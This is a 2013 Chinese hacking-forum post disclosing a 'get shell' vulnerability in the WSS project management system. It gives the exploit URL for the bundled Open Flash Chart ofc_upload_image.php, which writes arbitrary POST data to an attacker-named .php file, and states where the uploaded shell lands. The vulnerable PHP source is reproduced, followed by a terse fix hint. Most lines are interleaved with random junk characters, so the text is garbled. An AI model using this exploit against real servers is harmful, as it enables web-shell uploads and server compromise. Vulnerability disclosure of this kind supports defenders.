找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2219|回复: 0
打印 上一主题 下一主题

WSS项目管理系统Post get shell

[复制链接]
跳转到指定楼层
楼主
发表于 2013-2-23 12:38:58 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
POST 数据漏洞文件执行任意后缀文件保存9 d8 i4 O% `+ ]8 M" d/ |& G5 `
漏洞文件/chart/php-ofc-library/ofc_upload_image.php4 T# w8 p" U, h& ^

' ?* ?" y0 @! E  a利用:
2 B& Y; J! t6 \; e/ m/chart/php-ofc-library/ofc_upload_image.php?name=hfy.php hfy.php 文件名4 S5 G& |! j6 Z0 {6 D6 o/ Z  `
' M, F5 w* z$ U2 d! v# w* ^
Post任意数据/ t1 `& [' O( Q0 A' S
保存位置http://localhost/chart/tmp-upload-images/hfy.php) d8 [, o4 B" k8 P, z

$ }- U* S; A! \6 x
: w6 |' B, W5 n2 |0 u) x最新版wss漏洞文件,即使是收费版本也有的,在新浪商店部署的demo~
" j. z/ W! R! Y# |" m% ~. R9 \" h% R0 x3 O" V: R, N
<?php) k+ `# B+ I% H1 X  |% f
3 {  c+ G3 n8 R& u/ q% h1 L* |' T7 X
//! {, u: s' [, X4 R
// In Open Flash Chart -> save_image debug mode, you! |  Q. S9 ^5 x/ ]
// will see the 'echo' text in a new window.4 c1 n8 h. H- c2 Y/ J
//' L) c# N. S$ y% t
. [+ X7 C2 d( v! s
/*
3 f% k$ }. p. V/ X# C
+ J) N! T! q% hprint_r( $_GET );; ?! x' r; U+ J+ r
print_r( $_POST );
' c; N! N5 R* X  M0 c' nprint_r( $_FILES );
& B/ U& \: |" I( G
& I$ x1 g0 r6 i1 d1 {* Y$ u  iprint_r( $GLOBALS );
7 W) }: O' w7 v! ]print_r( $GLOBALS["HTTP_RAW_POST_DATA"] );
+ ]  b: R4 r/ y7 j1 U% }. F5 X+ k1 D$ m+ t
*/; L1 l$ F1 w$ Z' a( W8 h
// default path for the image to be stored //& \$ K. X$ v" I; q$ }8 B
$default_path = '../tmp-upload-images/';
$ g. |; I1 S5 M/ h
/ n, S5 I+ m7 p0 t$ a9 ?if (!file_exists($default_path)) mkdir($default_path, 0777, true);2 P! r, F1 H8 \: N. M! Z! S0 N

* X( [$ \/ X) [7 E) |- V// full path to the saved image including filename /// K% k/ s4 O3 X% G7 i9 ?. ]
$destination = $default_path . basename( $_GET[ 'name' ] ); 5 E1 ~5 j" ?/ q7 E1 h; W9 W
8 Q5 U( U. A& k
echo 'Saving your image to: '. $destination;
: w# l, W: n6 T/ G: t// print_r( $_POST );
" E" }  e/ S" `// print_r( $_SERVER );) i1 Q# M* }& L( m% q3 H& L  b
// echo $HTTP_RAW_POST_DATA;
1 u' {" K! v3 f8 o$ h5 ~
% G* M) P$ y5 j  ^1 M//2 Q  o/ v9 y% n* X* F, J
// POST data is usually string data, but we are passing a RAW .png
6 ?" v7 ?6 n1 P/ F; @" \0 Q// so PHP is a bit confused and $_POST is empty. But it has saved
9 k# u3 P) N' U0 r$ g# H( `// the raw bits into $HTTP_RAW_POST_DATA
, D3 d0 s- h, u* X- ]4 h//
, A% s9 u  W0 E" L
! u: G5 b% c7 l$jfh = fopen($destination, 'w') or die("can't open file");
* @/ w/ W* S) n/ M1 ?( Efwrite($jfh, $HTTP_RAW_POST_DATA);
9 L) m# S: b0 W8 m! n) S) \fclose($jfh);/ r- i0 |' ]2 j" Q2 ^

# V' X0 v, e6 s- b1 B//
# Q" R: [' H9 |- Z& {3 q( V// LOOK:- M$ X+ u+ b6 @( R( U! P0 H) C0 L( J
//# }; b5 g9 i$ ~) u3 @. c2 V+ Y
exit();5 A2 b5 E3 S) j: c& u
//
: K3 B4 Q9 a, f" c+ v// PHP5:
+ B& _+ p4 ^( k+ |/ B8 K//
* C- m  [2 A) v0 y  ?' d# |* t" l! K: x0 L/ V
$ M6 h0 S& I+ E0 d+ k/ Z
// default path for the image to be stored //: k3 F" T' `3 y
$default_path = 'tmp-upload-images/';
8 D7 D# J! a2 T6 A8 l2 }& q6 n( _0 K& {" @+ `3 n9 ]7 V" W
if (!file_exists($default_path)) mkdir($default_path, 0777, true);- S1 D) h3 v* S1 z
3 B2 V( V% A: [( k7 q% I
// full path to the saved image including filename /// x' t3 H" q9 v, j) S& e# k% @
$destination = $default_path . basename( $_FILES[ 'Filedata' ][ 'name' ] );
: s, j; \# ~: a9 F9 [% ^
$ O' L8 u+ {& O1 Z// move the image into the specified directory //
' t5 n$ h9 N4 L% Z  oif (move_uploaded_file($_FILES[ 'Filedata' ][ 'tmp_name' ], $destination)) {" j5 T* b0 c4 Z$ l9 Z
    echo "The file " . basename( $_FILES[ 'Filedata' ][ 'name' ] ) . " has been uploaded;";
$ U: ~) U" h; f' P7 a: Y8 O6 v} else {
3 z. C2 c  N: ~1 e: G9 O& N) N    echo "FILE UPLOAD FAILED";
$ O+ X* m! z+ N  U" [}% S- W" m. v) [% p
* p) T- _3 b: b5 H7 m' x/ W! v

7 D( S+ f6 q( g2 t/ i1 _?>
- @( `0 ~1 }( X. p5 U# _- U
" x1 W, g3 N, ]6 J0 _
- l+ R+ I/ i7 u6 a; L5 Y2 R, H+ ?) d- x1 l! ^

# X" K3 P2 D/ K8 |# Q! y  w7 v1 _* [) s
0 X+ M& B5 `' Y) n
修复方案:
# {0 w- R7 {, I5 y5 f, X% [这个漏洞文件就是个杯具,怎么破,加权限验证,后缀等验证~,自己搞
1 F1 Z- Z) B5 W; Y! u4 z4 O, |7 e. d7 @7 S& f8 W" x9 Z8 b7 F

" G/ j! v' H, Z' v' z6 \
& k6 y* a, ^: y. l" c8 @# t) b6 D8 h& p

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?立即注册

x
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表